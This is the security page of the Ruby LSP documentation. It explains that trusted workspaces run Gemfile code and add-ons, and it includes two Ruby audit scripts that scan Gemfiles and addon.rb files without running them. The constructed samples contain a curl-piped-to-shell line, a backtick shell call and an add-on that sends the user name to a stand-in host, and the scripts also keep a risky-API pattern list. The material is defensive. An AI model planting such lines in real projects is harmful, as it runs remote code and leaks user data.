File: security.markdown

Package: ruby-ruby-lsp 0.26.7-1 (Debian, area main; in suites forky, sid)
---
layout: default
title: Security
nav_order: 25
---

# Security

This page documents potential risks when using the Ruby LSP VS Code extension and the Ruby LSP language server with untrusted code.

## Trust Model

**Ruby LSP assumes that all code in your workspace (including dependencies) is trusted.**

When you open a project with Ruby LSP, the extension and language server will execute code from that project as part of
normal operation. This is fundamentally similar to running `bundle install` in that project directory.

If you are working with code you do not fully trust, you should be aware of the potential risks documented below.

## Code Execution Vectors

The following is a non-exhaustive list of ways that Ruby LSP may execute code from your workspace:

### Bundle Installation

Ruby LSP automatically runs Bundler operations (e.g. `bundle install`, `bundle update`) when it starts up and when it
detects changes to your Gemfile. This will:

- Execute any code in your Gemfile (Gemfiles are Ruby code)
- Install gems specified in the Gemfile, which may include native extensions that execute during installation
- Run any post-install hooks defined by gems
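As an added example that is not part of Ruby LSP, the script below shows what "Gemfiles are Ruby code" means in practice. It parses a Gemfile with Ripper (Ruby standard library) without evaluating it and lists every method call that is not part of Bundler's Gemfile DSL; those are the lines to read before you let `bundle install` or Ruby LSP evaluate the file. The sample Gemfile, the `example.invalid` host and the `BUNDLER_DSL` allowlist are this example's own assumptions; the allowlist should be checked against the Bundler version in use, and anything it lacks surfaces as an extra entry to review rather than as a miss.

```ruby
require "ripper"

# Bundler's Gemfile DSL as the author of this example knows it (assumption:
# verify against the Bundler version you actually run).
BUNDLER_DSL = %w[
  source gem gemspec group platform platforms ruby git_source git github
  path install_if plugin env eval_gemfile
].freeze

# Constructed sample Gemfile: DSL lines followed by three lines of ordinary
# Ruby that would run the moment Bundler evaluates the file.
SAMPLE_GEMFILE = <<~'GEMFILE'
  source "https://rubygems.org"
  ruby "3.3.0"
  gemspec
  gem "rails", "~> 7.1"
  group :development do
    gem "ruby-lsp", require: false
  end
  # Nothing below is Bundler DSL; each line executes when the Gemfile is evaluated.
  File.write(File.join(Dir.home, ".gemfile-was-evaluated"), Time.now.to_s)
  system("curl -fsSL https://example.invalid/setup.sh | sh")
  `id`
GEMFILE

# Line number of the first token inside a node. Ripper tokens look like
# [:@tstring_content, "id", [line, column]].
def first_line(node)
  return nil unless node.is_a?(Array)
  return node[2][0] if node[0].to_s.start_with?("@") && node[2].is_a?(Array)
  node.each do |child|
    line = first_line(child)
    return line if line
  end
  nil
end

# Walk the Ripper S-expression and collect [method_name, line] for every call.
# Backtick shell-outs have no method name and are reported as "`...`".
def collect_calls(node, out = [])
  return out unless node.is_a?(Array)
  case node[0]
  when :command, :fcall, :vcall
    # [:command, [:@ident, "gem", [line, col]], args], [:fcall, ident], [:vcall, ident]
    ident = node[1]
    out << [ident[1], ident[2][0]] if ident.is_a?(Array) && ident[0].to_s.start_with?("@")
  when :call, :command_call
    # [:call, receiver, period, [:@ident, "write", [line, col]]]; node[3] is the
    # symbol :call for `recv.()`, which carries no name and is skipped.
    ident = node[3]
    out << [ident[1], ident[2][0]] if ident.is_a?(Array) && ident[0].to_s.start_with?("@")
  when :xstring_literal
    out << ["`...`", first_line(node)]
  end
  node.each { |child| collect_calls(child, out) }
  out
end

# [name, line] pairs for every call outside the Gemfile DSL. The source is
# parsed only; nothing in it is executed.
def suspicious_calls(gemfile_source)
  sexp = Ripper.sexp(gemfile_source)
  raise ArgumentError, "Gemfile does not parse as Ruby" if sexp.nil?
  collect_calls(sexp).reject { |name, _line| BUNDLER_DSL.include?(name) }.uniq
end

def report(gemfile_source)
  calls = suspicious_calls(gemfile_source)
  return "only Bundler DSL calls found" if calls.empty?
  calls.map { |name, line| "line #{line}: #{name}" }.join("\n")
end

if __FILE__ == $PROGRAM_NAME
  puts "Calls outside the Bundler DSL (review before trusting the project):"
  puts report(SAMPLE_GEMFILE)
end
```

To check a real checkout, call `report(File.read("path/to/Gemfile"))`; legitimate Gemfiles that use `ENV.fetch` or `require` will show up too, which is intended: the output is a reading list, not a verdict.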

### Add-ons / Plugins

Ruby LSP has an add-on system that automatically discovers and loads add-ons from:

- Gems in your bundle that contain `ruby_lsp/**/addon.rb` files
- Files matching `ruby_lsp/**/addon.rb` anywhere in your workspace

Add-ons are loaded via `require` and their `activate` method is called, allowing them to execute arbitrary Ruby code.
This is by design - add-ons can spawn processes, make network requests, or perform any other operation.
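As an added example (not Ruby LSP's own code), the following script applies the two discovery rules above to a checkout before it is opened as a trusted workspace: it globs `ruby_lsp/**/addon.rb` under the workspace and under a list of gem install directories, then summarizes each add-on file it finds without requiring it. The gem directories are an input; in practice pass the directories under `File.join(Gem.dir, "gems")` or the `gems` directory of a `vendor/bundle` path (assumption: that is where your bundle's gems live), not anything obtained by loading the bundle, since that would evaluate the Gemfile. The sample tree, the add-on contents, the `RISKY_APIS` list and the `example.invalid` host are constructed for this example.

```ruby
require "tmpdir"
require "fileutils"

# The discovery pattern the page names; Ruby LSP looks for it in the
# workspace and in the gems of the bundle.
ADDON_GLOB = "ruby_lsp/**/addon.rb"

# Heuristic: APIs worth a second look in an add-on. A match is a prompt to
# read that line, not proof of anything.
RISKY_APIS = /\b(?:system|spawn|exec|Open3|Process\.|Net::HTTP|TCPSocket|Socket|URI\.open)\b|`/

AddonReport = Struct.new(:path, :origin, :class_name, :defines_activate, :api_hits)

# Find add-on entry points in a workspace checkout and in gem directories,
# and summarize each one. Nothing is required or executed.
def discover_addons(workspace:, gem_dirs: [])
  files = Dir.glob(File.join(workspace, "**", ADDON_GLOB)).map { |p| [p, "workspace"] }
  gem_dirs.each do |dir|
    Dir.glob(File.join(dir, "**", ADDON_GLOB)).each { |p| files << [p, "gem:#{File.basename(dir)}"] }
  end
  files.sort.map { |path, origin| inspect_addon(path, origin) }
end

def inspect_addon(path, origin)
  src = File.read(path)
  class_name = src[/^\s*class\s+([\w:]+)\s*<\s*(?:::)?RubyLsp::Addon\b/, 1]
  hits = src.each_line.with_index(1)
            .select { |line, _| line.match?(RISKY_APIS) }
            .map { |line, n| "#{n}: #{line.strip}" }
  AddonReport.new(path, origin, class_name, src.match?(/^\s*def\s+activate\b/), hits)
end

def format_report(reports)
  reports.map do |r|
    lines = ["#{r.origin}: #{r.path}",
             "  class: #{r.class_name || '(no RubyLsp::Addon subclass found)'}, defines activate: #{r.defines_activate}"]
    r.api_hits.each { |h| lines << "  review: #{h}" }
    lines.join("\n")
  end.join("\n")
end

def write_file(path, content)
  FileUtils.mkdir_p(File.dirname(path))
  File.write(path, content)
end

# Constructed sample tree: one add-on in the workspace, one inside a gem, plus
# files that must not be picked up. Returns [workspace_dir, gem_dir].
def build_sample_tree
  root = Dir.mktmpdir("addon-audit")
  ws = File.join(root, "project")
  gem_dir = File.join(root, "gems", "helper-1.0")

  write_file(File.join(ws, "lib", "ruby_lsp", "my_tool", "addon.rb"), <<~'RUBY')
    module MyTool
      class Addon < ::RubyLsp::Addon
        # Called automatically once the workspace is trusted and the server starts.
        def activate(global_state, outgoing_queue)
          @pid = spawn("my_tool_daemon", "--socket", ".my_tool.sock")
        end

        def deactivate; end
      end
    end
  RUBY
  write_file(File.join(ws, "lib", "ruby_lsp", "my_tool", "server.rb"), "# not an add-on entry point\n")
  write_file(File.join(gem_dir, "lib", "ruby_lsp", "helper", "addon.rb"), <<~'RUBY')
    require "net/http"

    module Helper
      class Addon < ::RubyLsp::Addon
        def activate(global_state, outgoing_queue)
          Net::HTTP.get(URI("https://example.invalid/ping?u=#{ENV["USER"]}"))
        end

        def deactivate; end
      end
    end
  RUBY
  write_file(File.join(gem_dir, "lib", "helper.rb"), "module Helper; end\n")
  [ws, gem_dir]
end

if __FILE__ == $PROGRAM_NAME
  ws, gem_dir = build_sample_tree
  puts format_report(discover_addons(workspace: ws, gem_dirs: [gem_dir]))
end
```

Run it against a real checkout with `discover_addons(workspace: ".", gem_dirs: Dir.glob(File.join(Gem.dir, "gems", "*")))`; every path it prints is a file whose `activate` method will run as soon as the workspace is trusted.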

## Recommendations

1. **Understand what "Trust" means** - trusting a project in Ruby LSP means you should be as comfortable as you would be running `bundle install` in that directory, because that is effectively what happens.
2. **Understand [VS Code's Workspace Trust](https://code.visualstudio.com/docs/editor/workspace-trust)** - when opening unfamiliar projects, click "Don't Trust" on the workspace trust prompt.
   Ruby LSP does not start in untrusted workspaces, so none of the code execution vectors above are reachable until you choose to trust the workspace.
3. **Be cautious with unfamiliar add-ons** - add-ons have full access to your system once activated, so read the `addon.rb` of any add-on you do not recognize before trusting the workspace.

## Reporting Security Issues

If you discover a security vulnerability in Ruby LSP, please report it through
[GitHub Security Advisories](https://github.com/Shopify/ruby-lsp/security/advisories/new) rather than opening a public
issue.